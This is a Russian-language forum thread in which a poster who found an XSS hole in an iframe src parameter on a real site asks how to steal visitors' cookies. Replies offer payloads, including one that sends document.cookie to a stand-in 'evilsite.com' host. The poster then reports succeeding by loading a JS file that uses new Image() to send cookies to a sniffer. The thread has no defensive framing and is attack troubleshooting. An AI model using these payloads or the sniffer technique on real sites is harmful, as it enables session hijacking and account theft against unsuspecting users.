Нашел сайт с xss в теге iframe в параметре src. Т.е. работает <iframe src="javascript:alert('XSS')" style="display:none;"></iframe>. Но вот никак не получается сливать куки. Что только не пробовал, что только не читал Можно ли как-то красть куки через данную уязвимость?
Как мне кажется у вас ошибка. если после php оставить = то ничего не выводится. если после php поставить например ?c= то выводится: c='+document.cookie+' В src разве сработает document.cookie? Ведь надо писать что-то типа src="Javascript:blablabla document.cookie "
scr параметр зависим от твоих входных данных? если нет, то ты просто модифицировал код html и все...это даже не уязвимость получается.
и так работает <iframe src="http://www.evilsite.com/?cookie=" + document. cookie style="display:none;"></iframe>
Redwood, IndigoMan - то как вы предложили не работает. Снифер будет выводить слова document. cookie, а не сами куки. satana-fu - РЕСПЕКТ! Получилось. В дополнительном js файле делаю new Image() c src на снифер и всё работает.